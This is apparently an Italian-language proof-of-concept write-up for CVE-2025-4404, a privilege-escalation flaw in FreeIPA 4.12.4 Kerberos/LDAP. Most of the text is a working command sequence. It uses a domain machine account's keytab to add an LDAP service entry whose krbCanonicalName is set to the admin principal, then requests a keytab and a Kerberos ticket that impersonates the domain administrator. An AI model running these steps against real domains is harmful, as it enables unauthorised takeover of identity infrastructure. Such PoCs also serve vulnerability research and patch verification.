
PoC per CVE-2025-4404
PoC per CVE-2025-4404
Se si dispone di un account computer di dominio (host/pc1.[email protected]), allora è possibile aggiungere il servizio per impostazione predefinita. E puoi impostare krbPrincipalName e krbCanonicalName. Per impostazione predefinita, il valore dell'attributo krbCanonicalName è assente per l'account amministratore FreeIPA 4.12.4. Puoi richiedere un ticket Kerberos con il valore krbPrincipalName, ma il ticket conterrà il valore krbCanonicalName.
Andiamo
Per prima cosa, richiederemo un ticket per conto dell'account computer:
$ kinit host/[email protected] -k -t /etc/krb5.keytab
Aggiungi al servizio account LDAP:
$ ldapadd -H ldap://dc1.test.local
dn: krbprincipalname=test/[email protected],cn=services,cn=accounts,dc=test,dc=local
ipaKrbPrincipalAlias: test/[email protected]
krbPrincipalName: test/[email protected]
objectClass: ipaKrbPrincipal
objectClass: ipaObject
objectClass: ipaService
objectClass: krbPrincipal
objectClass: krbPrincipalAux
objectClass: top
krbCanonicalName: [email protected]
managedBy: fqdn=pc1.test.local,cn=computers,cn=accounts,dc=test,dc=local
$ ipa-getkeytab -p test/[email protected] -k ./test.keytab --mech=GSSAPI
$ kdestroy -A
$ kinit --no-request-pac -k -t ./test.keytab test/[email protected]PWN!!!
Puoi verificare il ticket con:
ldapwhoami -H ldap://dc1.test.local